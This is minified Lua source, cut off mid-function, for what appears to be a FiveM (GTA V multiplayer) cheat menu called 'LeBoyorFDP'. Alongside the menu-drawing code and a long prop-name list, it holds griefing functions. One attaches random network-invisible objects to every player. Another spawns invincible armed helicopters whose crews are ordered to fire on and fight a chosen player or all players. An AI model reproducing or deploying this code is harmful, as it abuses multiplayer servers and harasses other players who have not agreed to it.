LeBoyorFDP = {} local a = true local b = {} local c = {up = 172, down = 173, left = 174, right = 175, select = 215, back = 194} local d = 0 local e = nil local f = nil local g = 0.11 local h = 0.03 local i = 1.0 local j = 0.038 local k = 0 local l = 0.365 local m = 0.005 local n = 0.005 function math.round(o, p) return tonumber(string.format("%." .. (p or 0) .. "f", o)) end function LeBoyorFDPRGBRainbow(q) local r = {} local s = GetGameTimer() / 1000 r.r = math.floor(math.sin(s * q + 0) * 127 + 128) r.g = math.floor(math.sin(s * q + 2) * 127 + 128) r.b = math.floor(math.sin(s * q + 4) * 127 + 128) return r end function setMenuProperty(t, u, v) if t and b[t] then b[t][u] = v end end function isMenuVisible(t) if t and b[t] then return b[t].visible else return false end end function setMenuVisible(t, w, x) if t and b[t] then setMenuProperty(t, "visible", w) if not x and b[t] then setMenuProperty(t, "currentOption", 1) end if w then if t ~= f and isMenuVisible(f) then setMenuVisible(f, false) end f = t end end end function drawText(y, z, A, B, C, D, E, F, G) SetTextColour(C.r, C.g, C.b, C.a) SetTextFont(B) SetTextScale(D, D) if F then SetTextDropShadow(2, 2, 0, 0, 0) end if b[f] then if E then SetTextCentre(E) elseif G then SetTextWrap(b[f].x, b[f].x + b[f].width - m) SetTextRightJustify(true) end end BeginTextCommandDisplayText("STRING") AddTextComponentSubstringPlayerName(y) EndTextCommandDisplayText(z, A) end function drawRect(z, A, H, I, C) DrawRect(z, A, H, I, C.r, C.g, C.b, C.a) end function drawTitle() if b[f] then local z = b[f].x + b[f].width / 2 local A = b[f].y + g / 2 if b[f].titleBackgroundSprite then DrawSprite( b[f].titleBackgroundSprite.dict, b[f].titleBackgroundSprite.name, z, A, b[f].width, g, 0., 255, 255, 255, 255 ) else drawRect(z, A, b[f].width, g, b[f].titleBackgroundColor) end drawText(b[f].title, z, A - g / 2 + h, b[f].titleFont, b[f].titleColor, i, true) end end function drawSubTitle() if b[f] then local z = b[f].x + b[f].width / 2 local A = b[f].y + g + j / 2 local J = { r = b[f].titleBackgroundColor.r, g = b[f].titleBackgroundColor.g, b = b[f].titleBackgroundColor.b, a = 255 } drawRect(z, A, b[f].width, j, b[f].subTitleBackgroundColor) drawText(b[f].subTitle, b[f].x + m, A - j / 2 + n, k, J, l, false) if d > b[f].maxOptionCount then drawText( tostring(b[f].currentOption) .. " / " .. tostring(d), b[f].x + b[f].width, A - j / 2 + n, k, J, l, false, false, true ) end end end function drawButton(y, K) local z = b[f].x + b[f].width / 2 local L = nil if b[f].currentOption <= b[f].maxOptionCount and d <= b[f].maxOptionCount then L = d elseif d > b[f].currentOption - b[f].maxOptionCount and d <= b[f].currentOption then L = d - (b[f].currentOption - b[f].maxOptionCount) end if L then local A = b[f].y + g + j + j * L - j / 2 local M = nil local N = nil local O = nil local F = false if b[f].currentOption == d then M = b[f].menuFocusBackgroundColor N = b[f].menuFocusTextColor O = b[f].menuFocusTextColor else M = b[f].menuBackgroundColor N = b[f].menuTextColor O = b[f].menuSubTextColor F = true end drawRect(z, A, b[f].width, j, M) drawText(y, b[f].x + m, A - j / 2 + n, k, N, l, false, F) if K then drawText(K, b[f].x + m, A - j / 2 + n, k, O, l, false, F, true) end end end function LeBoyorFDPCreateMenu(t, P) b[t] = {} b[t].title = P b[t].visible = false b[t].previousMenu = nil b[t].aboutToBeClosed = false b[t].x = 0.02 b[t].y = 0.04 b[t].width = 0.27 b[t].currentOption = 1 b[t].maxOptionCount = 9 b[t].titleFont = 1 b[t].titleColor = {r = 255, g = 255, b = 255, a = 255} b[t].titleBackgroundColor = {r = 0, g = 0, b = 0, a = 0} b[t].titleBackgroundSprite = nil b[t].menuTextColor = {r = 255, g = 255, b = 255, a = 255} b[t].menuSubTextColor = {r = 255, g = 255, b = 255, a = 255} b[t].menuFocusTextColor = {r = 0, g = 255, b = 255, a = 255} b[t].menuFocusBackgroundColor = {r = 0, g = 0, b = 0, a = 50} b[t].menuBackgroundColor = {r = 0, g = 0, b = 0, a = 0} b[t].subTitleBackgroundColor = {r = 0, g = 0, b = 0, a = 0} b[t].buttonPressedSound = {name = "SELECT", set = "HUD_FRONTEND_DEFAULT_SOUNDSET"} end function LeBoyorFDPSetSpriteColor(t, Q, R, S, T) setMenuProperty(t, "menuTextColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuBackgroundColor.a}) setMenuProperty(t, "titleColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuBackgroundColor.a}) setMenuProperty(t, "menuSubTextColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuBackgroundColor.a}) setMenuProperty(t, "menuFocusTextColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuBackgroundColor.a}) end function LeBoyorFDPCreateSubMenu(t, U, V) if b[U] then LeBoyorFDPCreateMenu(t, b[U].title) if V then setMenuProperty(t, "subTitle", string.upper(V)) else setMenuProperty(t, "subTitle", string.upper(b[U].subTitle)) end setMenuProperty(t, "previousMenu", U) setMenuProperty(t, "x", b[U].x) setMenuProperty(t, "y", b[U].y) setMenuProperty(t, "maxOptionCount", b[U].maxOptionCount) setMenuProperty(t, "titleFont", b[U].titleFont) setMenuProperty(t, "titleColor", b[U].titleColor) setMenuProperty(t, "titleBackgroundColor", b[U].titleBackgroundColor) setMenuProperty(t, "titleBackgroundSprite", b[U].titleBackgroundSprite) setMenuProperty(t, "menuTextColor", b[U].menuTextColor) setMenuProperty(t, "menuSubTextColor", b[U].menuSubTextColor) setMenuProperty(t, "menuFocusTextColor", b[U].menuFocusTextColor) setMenuProperty(t, "menuFocusBackgroundColor", b[U].menuFocusBackgroundColor) setMenuProperty(t, "menuBackgroundColor", b[U].menuBackgroundColor) setMenuProperty(t, "subTitleBackgroundColor", b[U].subTitleBackgroundColor) end end function LeBoyorFDPCurrentMenu() return f end function LeBoyorFDPOpenMenu(t) if t and b[t] then PlaySoundFrontend(-1, "SELECT", "HUD_FRONTEND_DEFAULT_SOUNDSET", true) setMenuVisible(t, true) end end function LeBoyorFDPIsMenuOpened(t) return isMenuVisible(t) end function LeBoyorFDPIsAnyMenuOpened() for t, W in pairs(b) do if isMenuVisible(t) then return true end end return false end function LeBoyorFDPIsMenuAboutToBeClosed() if b[f] then return b[f].aboutToBeClosed else return false end end function LeBoyorFDPCloseMenu() if b[f] then if b[f].aboutToBeClosed then b[f].aboutToBeClosed = false setMenuVisible(f, false) PlaySoundFrontend(-1, "QUIT", "HUD_FRONTEND_DEFAULT_SOUNDSET", true) d = 0 f = nil e = nil else b[f].aboutToBeClosed = true end end end function LeBoyorFDPButton(y, K) local X = y if K then X = "{ " .. tostring(X) .. ", " .. tostring(K) .. " }" end if b[f] then d = d + 1 local Y = b[f].currentOption == d drawButton(y, K) if Y then if e == c.select then PlaySoundFrontend(-1, b[f].buttonPressedSound.name, b[f].buttonPressedSound.set, true) return true elseif e == c.left or e == c.right then PlaySoundFrontend(-1, "NAV_UP_DOWN", "HUD_FRONTEND_DEFAULT_SOUNDSET", true) end end return false else return false end end function LeBoyorFDPMenuButton(y, t) if b[t] then if LeBoyorFDPButton(y) then setMenuVisible(f, false) setMenuVisible(t, true, true) return true end end return false end function LeBoyorFDPCheckBox(y, Z, _) if LeBoyorFDPButton(y, Z and "~w~~h~On" or "~h~~c~Off") then Z = not Z if _ then _(Z) end return true end return false end function LeBoyorFDPComboBox(y, a0, a1, a2, _) local a3 = #a0 local a4 = a0[a1] local Y = b[f].currentOption == d + 1 if a3 > 1 and Y then a4 = "← " .. tostring(a4) .. " →" end if LeBoyorFDPButton(y, a4) then a2 = a1 _(a1, a2) return true elseif Y then if e == c.left then if a1 > 1 then a1 = a1 - 1 else a1 = a3 end elseif e == c.right then if a1 < a3 then a1 = a1 + 1 else a1 = 1 end end else a1 = a2 end _(a1, a2) return false end function LeBoyorFDPDisplay() if isMenuVisible(f) then if b[f].aboutToBeClosed then LeBoyorFDPCloseMenu() else ClearAllHelpMessages() drawTitle() drawSubTitle() e = nil if IsDisabledControlJustReleased(1, c.down) then PlaySoundFrontend(-1, "NAV_UP_DOWN", "HUD_FRONTEND_DEFAULT_SOUNDSET", true) if b[f].currentOption < d then b[f].currentOption = b[f].currentOption + 1 else b[f].currentOption = 1 end elseif IsDisabledControlJustReleased(1, c.up) then PlaySoundFrontend(-1, "NAV_UP_DOWN", "HUD_FRONTEND_DEFAULT_SOUNDSET", true) if b[f].currentOption > 1 then b[f].currentOption = b[f].currentOption - 1 else b[f].currentOption = d end elseif IsDisabledControlJustReleased(1, c.left) then e = c.left elseif IsDisabledControlJustReleased(1, c.right) then e = c.right elseif IsDisabledControlJustReleased(1, c.select) then e = c.select elseif IsDisabledControlJustPressed(1, c.back) then if b[b[f].previousMenu] then PlaySoundFrontend(-1, "BACK", "HUD_FRONTEND_DEFAULT_SOUNDSET", true) setMenuVisible(b[f].previousMenu, true) else LeBoyorFDPCloseMenu() end end d = 0 end end end function LeBoyorFDPSetMenuWidth(t, H) setMenuProperty(t, "width", H) end function LeBoyorFDPSetMenuX(t, z) setMenuProperty(t, "x", z) end function LeBoyorFDPSetMenuY(t, A) setMenuProperty(t, "y", A) end function LeBoyorFDPSetMenuMaxOptionCountOnScreen(t, a5) setMenuProperty(t, "maxOptionCount", a5) end function LeBoyorFDPSetTitle(t, P) setMenuProperty(t, "title", P) end function LeBoyorFDPSetTitleColor(t, Q, R, S, T) setMenuProperty(t, "titleColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].titleColor.a}) end function LeBoyorFDPSetTitleBackgroundColor(t, Q, R, S, T) setMenuProperty( t, "titleBackgroundColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].titleBackgroundColor.a} ) end function LeBoyorFDPSetTitleBackgroundSprite(t, a6, a7) RequestStreamedTextureDict(a6) setMenuProperty(t, "titleBackgroundSprite", {dict = a6, name = a7}) end function LeBoyorFDPSetSubTitle(t, y) setMenuProperty(t, "subTitle", string.upper(y)) end function LeBoyorFDPSetMenuBackgroundColor(t, Q, R, S, T) setMenuProperty( t, "menuBackgroundColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuBackgroundColor.a} ) end function LeBoyorFDPSetMenuTextColor(t, Q, R, S, T) setMenuProperty(t, "menuTextColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuTextColor.a}) end function LeBoyorFDPSetMenuSubTextColor(t, Q, R, S, T) setMenuProperty(t, "menuSubTextColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuSubTextColor.a}) end function LeBoyorFDPSetMenuFocusColor(t, Q, R, S, T) setMenuProperty(t, "menuFocusColor", {["r"] = Q, ["g"] = R, ["b"] = S, ["a"] = T or b[t].menuFocusColor.a}) end function LeBoyorFDPSetMenuButtonPressedSound(t, a8, a9) setMenuProperty(t, "buttonPressedSound", {["name"] = a8, ["set"] = a9}) end function LeBoyorFDPDisplayBox(aa, ab, ac) AddTextEntry("FMMC_KEY_TIP9N", aa .. ":") DisplayOnscreenKeyboard(1, "FMMC_KEY_TIP9N", "", ab, "", "", "", ac) a78d8d85dssss = true while UpdateOnscreenKeyboard() ~= 1 and UpdateOnscreenKeyboard() ~= 2 do Citizen.Wait(0) end if UpdateOnscreenKeyboard() ~= 2 then local ad = GetOnscreenKeyboardResult() Citizen.Wait(500) a78d8d85dssss = false return ad else Citizen.Wait(500) a78d8d85dssss = false return nil end end local ae = { "prop_gold_cont_01", "p_crahsed_heli_s", "prop_rock_4_big2", "prop_beachflag_le", "prop_fnclink_05crnr1", "xs_prop_hamburgher_wl", "sr_prop_spec_tube_xxs_01a", "cargoplane", "prop_beach_fire", -145066854, "apa_mp_apa_yacht", "p_spinning_anus_s", "p_med_jet_01_s", "stt_prop_stunt_jump30", "stt_prop_stunt_jump15", "stt_prop_stunt_jump45", "stt_prop_stunt_track_dwslope15", "stt_prop_stunt_track_dwslope30", "prop_container_01a", "p_crahsed_heli_s", "prop_rock_4_big2", "prop_beachflag_le", "prop_gascage01", "prop_ld_ferris_wheel", "apa_mp_apa_crashed_usaf_01a", "apa_mp_apa_yacht", "apa_mp_apa_yacht_jacuzzi_ripple1", "apa_mp_apa_yacht_o3_rail_a", "apa_mp_apa_yacht_option1", "apa_mp_apa_yacht_option2", "apa_prop_ss1_mpint_garage2", "bkr_prop_biker_bblock_lrg2", "bkr_prop_biker_garage_locker_01", "bkr_prop_biker_landing_zone_01", "bkr_prop_biker_target", "bkr_prop_biker_target_small", "bkr_prop_bkr_cashpile_01", "bkr_prop_weed_med_01b", "ce_xr_ctr2", "gr_prop_gr_doorpart_f", "gr_prop_gr_crates_weapon_mix_01b", "gr_prop_gr_fnclink_03g", "gr_prop_gr_fnclink_03f", "gr_prop_gr_para_s_01", "prop_dt1_20_mp_gar", "prop_dummy_01", "prop_dumpster_4b", "prop_dumpster_4a", "prop_elecbox_01a", "prop_elecbox_16", "prop_phonebox_04", "prop_pier_kiosk_03", "prop_pile_dirt_02", "prop_pile_dirt_07_cr", "prop_rub_wreckage_9", "prop_telegraph_01b", "sr_prop_spec_tube_crn_01a", "prop_ind_barge_01_cr", "prop_ind_deiseltank", "prop_ind_oldcrane", "prop_inflatearch_01", "w_ar_musket", "xm_prop_tunnel_fan_01", "xm_prop_x17_l_glass_01", "xm_prop_x17_mine_01a", "xm_prop_x17_mine_03a", "xm_prop_x17_osphatch_27m", "xm_prop_x17_pillar", "xm_prop_x17_osphatch_op_27m", "xm_prop_x17_shamal_crash", "xm_prop_x17_silo_01a", "xm_prop_x17_sub", "xm_prop_x17_sub_damage", "xm_prop_x17_trail_01a", "xm_prop_x17_xmas_tree_int", "dt1_05_build1_damage", "dt1_05_build1_damage_lod", "xs_combined2_dyst_07_build_a", "xs_combined2_dyst_07_build_b", "xs_combined2_dyst_07_build_c", "xs_combined2_dyst_07_build_e", "xs_combined2_dyst_build_01a_09", "xs_combined2_dyst_build_01b_09", "xs_combined2_dyst_build_02a_09", "xs_combined2_dyst_longbuild_b_09", "xs_combined2_dyst_longbuild_c_09", "dt1_05_build1_h", "prop_rock_1_h", "prop_test_boulder_01", "prop_test_boulder_02", "prop_test_boulder_03", "prop_test_boulder_04", "apa_mp_apa_crashed_usaf_01a", "ex_prop_exec_crashdp", "apa_mp_apa_yacht_o1_rail_a", "apa_mp_apa_yacht_o1_rail_b", "apa_mp_h_yacht_armchair_01", "apa_mp_h_yacht_armchair_03", "apa_mp_h_yacht_armchair_04", "apa_mp_h_yacht_barstool_01", "apa_mp_h_yacht_bed_01", "apa_mp_h_yacht_bed_02", "apa_mp_h_yacht_coffee_table_01", "apa_mp_h_yacht_coffee_table_02", "apa_mp_h_yacht_floor_lamp_01", "apa_mp_h_yacht_side_table_01", "apa_mp_h_yacht_side_table_02", "apa_mp_h_yacht_sofa_01", "apa_mp_h_yacht_sofa_02", "apa_mp_h_yacht_stool_01", "apa_mp_h_yacht_strip_chair_01", "apa_mp_h_yacht_table_lamp_01", "apa_mp_h_yacht_table_lamp_02", "apa_mp_h_yacht_table_lamp_03", "prop_flag_columbia", "apa_mp_apa_yacht_o2_rail_a", "apa_mp_apa_yacht_o2_rail_b", "apa_mp_apa_yacht_o3_rail_a", "apa_mp_apa_yacht_o3_rail_b", "apa_mp_apa_yacht_option1", "proc_searock_01", "apa_mp_h_yacht_", "apa_mp_apa_yacht_option1_cola", "apa_mp_apa_yacht_option2", "apa_mp_apa_yacht_option2_cola", "apa_mp_apa_yacht_option2_colb", "apa_mp_apa_yacht_option3", "apa_mp_apa_yacht_option3_cola", "apa_mp_apa_yacht_option3_colb", "apa_mp_apa_yacht_option3_colc", "apa_mp_apa_yacht_option3_cold", "apa_mp_apa_yacht_option3_cole", "apa_mp_apa_yacht_jacuzzi_cam", "apa_mp_apa_yacht_jacuzzi_ripple003", "apa_mp_apa_yacht_jacuzzi_ripple1", "apa_mp_apa_yacht_jacuzzi_ripple2", "apa_mp_apa_yacht_radar_01a", "apa_mp_apa_yacht_win", "prop_crashed_heli", "apa_mp_apa_yacht_door", "prop_shamal_crash", "xm_prop_x17_shamal_crash", "apa_mp_apa_yacht_door2", "apa_mp_apa_yacht", "prop_flagpole_2b", "prop_flagpole_2c", "prop_flag_canada", "apa_prop_yacht_float_1a", "apa_prop_yacht_float_1b", "apa_prop_yacht_glass_01", "apa_prop_yacht_glass_02", "apa_prop_yacht_glass_03", "apa_prop_yacht_glass_04", "apa_prop_yacht_glass_05", "apa_prop_yacht_glass_06", "apa_prop_yacht_glass_07", "apa_prop_yacht_glass_08", "apa_prop_yacht_glass_09", "apa_prop_yacht_glass_10", "prop_flag_canada_s", "prop_flag_eu", "prop_flag_eu_s", "prop_target_blue_arrow", "prop_target_orange_arrow", "prop_target_purp_arrow", "prop_target_red_arrow", "apa_prop_flag_argentina", "apa_prop_flag_australia", "apa_prop_flag_austria", "apa_prop_flag_belgium", "apa_prop_flag_brazil", "apa_prop_flag_canadat_yt", "apa_prop_flag_china", "apa_prop_flag_columbia", "apa_prop_flag_croatia", "apa_prop_flag_czechrep", "apa_prop_flag_denmark", "apa_prop_flag_england", "apa_prop_flag_eu_yt", "apa_prop_flag_finland", "apa_prop_flag_france", "apa_prop_flag_german_yt", "apa_prop_flag_hungary", "apa_prop_flag_ireland", "apa_prop_flag_israel", "apa_prop_flag_italy", "apa_prop_flag_jamaica", "apa_prop_flag_japan_yt", "apa_prop_flag_canada_yt", "apa_prop_flag_lstein", "apa_prop_flag_malta", "apa_prop_flag_mexico_yt", "apa_prop_flag_netherlands", "apa_prop_flag_newzealand", "apa_prop_flag_nigeria", "apa_prop_flag_norway", "apa_prop_flag_palestine", "apa_prop_flag_poland", "apa_prop_flag_portugal", "apa_prop_flag_puertorico", "apa_prop_flag_russia_yt", "apa_prop_flag_scotland_yt", "apa_prop_flag_script", "apa_prop_flag_slovakia", "apa_prop_flag_slovenia", "apa_prop_flag_southafrica", "apa_prop_flag_southkorea", "apa_prop_flag_spain", "apa_prop_flag_sweden", "apa_prop_flag_switzerland", "apa_prop_flag_turkey", "apa_prop_flag_uk_yt", "apa_prop_flag_us_yt", "apa_prop_flag_wales", "prop_flag_uk", "prop_flag_uk_s", "prop_flag_us", "prop_flag_usboat", "prop_flag_us_r", "prop_flag_us_s", "prop_flag_france", "prop_flag_france_s", "prop_flag_german", "prop_flag_german_s", "prop_flag_ireland", "prop_flag_ireland_s", "prop_flag_japan", "prop_flag_japan_s", "prop_flag_ls", "prop_flag_lsfd", "prop_flag_lsfd_s", "prop_flag_lsservices", "prop_flag_lsservices_s", "prop_flag_ls_s", "prop_flag_mexico", "prop_flag_mexico_s", "prop_flag_russia", "prop_flag_russia_s", "prop_flag_s", "prop_flag_sa", "prop_flag_sapd", "prop_flag_sapd_s", "prop_flag_sa_s", "prop_flag_scotland", "prop_flag_scotland_s", "prop_flag_sheriff", "prop_flag_sheriff_s", "prop_flag_uk", "prop_flag_uk_s", "prop_flag_us", "prop_flag_usboat", "prop_flag_us_r", "prop_flag_us_s", "prop_flamingo", "prop_swiss_ball_01", "prop_air_bigradar_l1", "prop_air_bigradar_l2", "prop_air_bigradar_slod", "p_fib_rubble_s", "prop_money_bag_01", "p_cs_mp_jet_01_s", "prop_poly_bag_money", "prop_air_radar_01", "hei_prop_carrier_radar_1", "prop_air_bigradar", "prop_carrier_radar_1_l1", "prop_asteroid_01", "prop_xmas_ext", "p_oil_pjack_01_amo", "p_oil_pjack_01_s", "p_oil_pjack_02_amo", "p_oil_pjack_03_amo", "p_oil_pjack_02_s", "p_oil_pjack_03_s", "prop_aircon_l_03", "prop_med_jet_01", "p_med_jet_01_s", "hei_prop_carrier_jet", "bkr_prop_biker_bblock_huge_01", "bkr_prop_biker_bblock_huge_02", "bkr_prop_biker_bblock_huge_04", "bkr_prop_biker_bblock_huge_05", "hei_prop_heist_emp", "prop_weed_01", "prop_air_bigradar", "prop_juicestand", "prop_lev_des_barge_02", "hei_prop_carrier_defense_01", "prop_aircon_m_04", "prop_mp_ramp_03", "stt_prop_stunt_track_dwuturn", "ch3_12_animplane1_lod", "ch3_12_animplane2_lod", "hei_prop_hei_pic_pb_plane", "light_plane_rig", "prop_cs_plane_int_01", "prop_dummy_plane", "prop_mk_plane", "v_44_planeticket", "prop_planer_01", "ch3_03_cliffrocks03b_lod", "cargoplane", "jet", "csx_coastsmalrock_02_", "csx_coastsmalrock_03_", "csx_coastsmalrock_04_", "mp_player_introck", "Heist_Yacht", "csx_coastsmalrock_05_", "mp_player_int_rock", "mp_player_introck", "prop_flagpole_1a", "prop_flagpole_2a", "prop_flagpole_3a", "prop_a4_pile_01", "cs2_10_sea_rocks_lod", "cs2_11_sea_marina_xr_rocks_03_lod", "prop_gold_cont_01", "prop_hydro_platform", "ch3_04_viewplatform_slod", "ch2_03c_rnchstones_lod", "proc_mntn_stone01", "prop_beachflag_le", "proc_mntn_stone02", "cs2_10_sea_shipwreck_lod", "des_shipsink_02", "prop_dock_shippad", "des_shipsink_03", "des_shipsink_04", "prop_mk_flag", "prop_mk_flag_2", "proc_mntn_stone03", "FreeModeMale01", "rsn_os_specialfloatymetal_n", "rsn_os_specialfloatymetal", "cs1_09_sea_ufo", "rsn_os_specialfloaty2_light2", "rsn_os_specialfloaty2_light", "rsn_os_specialfloaty2", "rsn_os_specialfloatymetal_n", "rsn_os_specialfloatymetal", "P_Spinning_Anus_S_Main", "P_Spinning_Anus_S_Root", "cs3_08b_rsn_db_aliencover_0001cs3_08b_rsn_db_aliencover_0001_a", "sc1_04_rnmo_paintoverlaysc1_04_rnmo_paintoverlay_a", "rnbj_wallsigns_0001", "proc_sml_stones01", "proc_sml_stones02", "maverick", "Miljet", "proc_sml_stones03", "proc_stones_01", "proc_stones_02", "proc_stones_03", "proc_stones_04", "proc_stones_05", "proc_stones_06", "prop_coral_stone_03", "prop_coral_stone_04", "prop_gravestones_01a", "prop_gravestones_02a", "prop_gravestones_03a", "prop_gravestones_04a", "prop_gravestones_05a", "prop_gravestones_06a", "prop_gravestones_07a", "prop_gravestones_08a", "prop_gravestones_09a", "prop_gravestones_10a", "prop_prlg_gravestone_05a_l1", "prop_prlg_gravestone_06a", "test_prop_gravestones_04a", "test_prop_gravestones_05a", "test_prop_gravestones_07a", "test_prop_gravestones_08a", "test_prop_gravestones_09a", "prop_prlg_gravestone_01a", "prop_prlg_gravestone_02a", "prop_prlg_gravestone_03a", "prop_prlg_gravestone_04a", "prop_stoneshroom1", "prop_stoneshroom2", "v_res_fa_stones01", "test_prop_gravestones_01a", "test_prop_gravestones_02a", "prop_prlg_gravestone_05a", "FreemodeFemale01", "p_cablecar_s", "stt_prop_stunt_tube_l", "stt_prop_stunt_track_dwuturn", "p_spinning_anus_s", "prop_windmill_01", "hei_prop_heist_tug", "prop_air_bigradar", "p_oil_slick_01", "prop_dummy_01", "hei_prop_heist_emp", "p_tram_cash_s", "hw1_blimp_ce2", "prop_fire_exting_1a", "prop_fire_exting_1b", "prop_fire_exting_2a", "prop_fire_exting_3a", "hw1_blimp_ce2_lod", "hw1_blimp_ce_lod", "hw1_blimp_cpr003", "hw1_blimp_cpr_null", "hw1_blimp_cpr_null2", "prop_lev_des_barage_02", "hei_prop_carrier_defense_01", "prop_juicestand", "S_M_M_MovAlien_01", "s_m_m_movalien_01", "s_m_m_movallien_01", "u_m_y_babyd", "CS_Orleans", "A_M_Y_ACult_01", "S_M_M_MovSpace_01", "U_M_Y_Zombie_01", "s_m_y_blackops_01", "a_f_y_topless_01", "a_c_boar", "a_c_cat_01", "a_c_chickenhawk", "a_c_chimp", "s_f_y_hooker_03", "a_c_chop", "a_c_cormorant", "a_c_cow", "a_c_coyote", "v_ilev_found_cranebucket", "p_cs_sub_hook_01_s", "a_c_crow", "a_c_dolphin", "a_c_fish", "hei_prop_heist_hook_01", "prop_rope_hook_01", "prop_sub_crane_hook", "s_f_y_hooker_01", "prop_vehicle_hook", "prop_v_hook_s", "prop_dock_crane_02_hook", "prop_winch_hook_long", "a_c_hen", "a_c_humpback", "a_c_husky", "a_c_killerwhale", "a_c_mtlion", "a_c_pigeon", "a_c_poodle", "prop_coathook_01", "prop_cs_sub_hook_01", "a_c_pug", "a_c_rabbit_01", "a_c_rat", "a_c_retriever", "a_c_rhesus", "a_c_rottweiler", "a_c_sharkhammer", "a_c_sharktiger", "a_c_shepherd", "a_c_stingray", "a_c_westy", "CS_Orleans", "prop_windmill_01", "prop_Ld_ferris_wheel", "p_tram_crash_s", "p_oil_slick_01", "p_ld_stinger_s", "p_ld_soc_ball_01", "p_parachute1_s", "p_cablecar_s", "prop_beach_fire", "prop_lev_des_barge_02", "prop_lev_des_barge_01", "prop_sculpt_fix", "prop_flagpole_2b", "prop_flagpole_2c", "prop_winch_hook_short", "prop_flag_canada", "prop_flag_canada_s", "prop_flag_eu", "prop_flag_eu_s", "prop_flag_france", "prop_flag_france_s", "prop_flag_german", "prop_ld_hook", "prop_flag_german_s", "prop_flag_ireland", "prop_flag_ireland_s", "prop_flag_japan", "prop_flag_japan_s", "prop_flag_ls", "prop_flag_lsfd", "prop_flag_lsfd_s", "prop_cable_hook_01", "prop_flag_lsservices", "prop_flag_lsservices_s", "prop_flag_ls_s", "prop_flag_mexico", "prop_flag_mexico_s", "csx_coastboulder_00", "des_tankercrash_01", "des_tankerexplosion_01", "des_tankerexplosion_02", "des_trailerparka_02", "des_trailerparkb_02", "des_trailerparkc_02", "des_trailerparkd_02", "des_traincrash_root2", "des_traincrash_root3", "des_traincrash_root4", "des_traincrash_root5", "des_finale_vault_end", "des_finale_vault_root001", "des_finale_vault_root002", "des_finale_vault_root003", "des_finale_vault_root004", "des_finale_vault_start", "des_vaultdoor001_root001", "des_vaultdoor001_root002", "des_vaultdoor001_root003", "des_vaultdoor001_root004", "des_vaultdoor001_root005", "des_vaultdoor001_root006", "des_vaultdoor001_skin001", "des_vaultdoor001_start", "des_traincrash_root6", "prop_ld_vault_door", "prop_vault_door_scene", "prop_vault_door_scene", "prop_vault_shutter", "p_fin_vaultdoor_s", "v_ilev_bk_vaultdoor", "prop_gold_vault_fence_l", "prop_gold_vault_fence_r", "prop_gold_vault_gate_01", "prop_bank_vaultdoor", "des_traincrash_root7", "prop_flag_russia", "prop_flag_russia_s", "prop_flag_s", "ch2_03c_props_rrlwindmill_lod", "prop_flag_sa", "prop_flag_sapd", "prop_flag_sapd_s", "prop_flag_sa_s", "prop_flag_scotland", "prop_flag_scotland_s", "prop_flag_sheriff", "prop_flag_sheriff_s", "prop_flag_uk", "prop_yacht_lounger", "prop_yacht_seat_01", "prop_yacht_seat_02", "prop_yacht_seat_03", "marina_xr_rocks_02", "marina_xr_rocks_03", "prop_test_rocks01", "prop_test_rocks02", "prop_test_rocks03", "prop_test_rocks04", "marina_xr_rocks_04", "marina_xr_rocks_05", "marina_xr_rocks_06", "prop_yacht_table_01", "csx_searocks_02", "csx_searocks_03", "csx_searocks_04", "csx_searocks_05", "csx_searocks_06", "p_yacht_chair_01_s", "p_yacht_sofa_01_s", "prop_yacht_table_02", "csx_coastboulder_00", "csx_coastboulder_01", "csx_coastboulder_02", "csx_coastboulder_03", "csx_coastboulder_04", "csx_coastboulder_05", "csx_coastboulder_06", "csx_coastboulder_07", "csx_coastrok1", "csx_coastrok2", "csx_coastrok3", "csx_coastrok4", "csx_coastsmalrock_01", "csx_coastsmalrock_02", "csx_coastsmalrock_03", "csx_coastsmalrock_04", "csx_coastsmalrock_05", "prop_yacht_table_03" } function LeBoyorFDPRandomProp() for af = 1, 3 do for W, ag in ipairs(GetActivePlayers()) do local ah = ae[math.random(1, 74)] modelHash = type(ah) == "number" and ah or GetHashKey(ah) if not HasModelLoaded(modelHash) then RequestModel(modelHash) while not HasModelLoaded(modelHash) do Citizen.Wait(1) end end local ai = CreateObjectNoOffset(modelHash, 0, 0, 0, true, false, true) NetworkSetEntityInvisibleToNetwork(ai, true) local aj = GetPlayerPed(ag) AttachEntityToEntity( ai, aj, GetPedBoneIndex(aj, 57005), 0.4, 0, 0, 0, 270.0, 60.0, true, true, false, true, 1, true ) end end end function LOKISpawnAllFireVehicle(ak) for W, af in ipairs(GetActivePlayers()) do LOKISpawnFireVehicle(af, ak) end end function LOKISpawnFireVehicle(af, veh) if IsModelValid(veh) then local al = GetEntityCoords(GetPlayerPed(af)) local am = veh local an = "csb_mweather" RequestModel(am) RequestModel(an) if not HasModelLoaded(am) then RequestModel(am) while not HasModelLoaded(am) do Citizen.Wait(1) end end if not HasModelLoaded(an) then RequestModel(an) while not HasModelLoaded(an) do Citizen.Wait(1) end end local ao = CreateVehicle(GetHashKey(am), al.x, al.y, al.z + 100.0, 0.0, true, false) local ap = CreatePedInsideVehicle(ao, 4, an, -1, true, false) SetHeliBladesFullSpeed(ao) SetCurrentPedVehicleWeapon(ap, GetHashKey("vehicle_weapon_player_buzzard")) SetVehicleShootAtTarget(ap, GetPlayerPed(af), al.x, al.y, al.z) local aq = PedToNet(ap) NetworkSetNetworkIdDynamic(aq, false) SetNetworkIdCanMigrate(aq, true) SetNetworkIdExistsOnAllMachines(aq, true) Citizen.Wait(30) NetToPed(aq) SetEntityInvincible(aq, true) SetPedCanSwitchWeapon(ap, true) TaskCombatPed(ap, GetPlayerPed(af), 0, 16) local ar = "weapon_carbinerifle_mk2" for as = 1, 3 do local at = CreatePedInsideVehicle(ao, 4, an, as, true, false) NetworkRegisterEntityAsNetworked(at) Citizen.CreateThread( function() if DoesEntityExist(at) and not IsEntityDead(GetPlayerPed(af)) then local au = PedToNet(at) NetworkSetNetworkIdDynamic(au, false) SetNetworkIdCanMigrate(au, true) SetNetworkIdExistsOnAllMachines(au, true) Citizen.Wait(100.0) 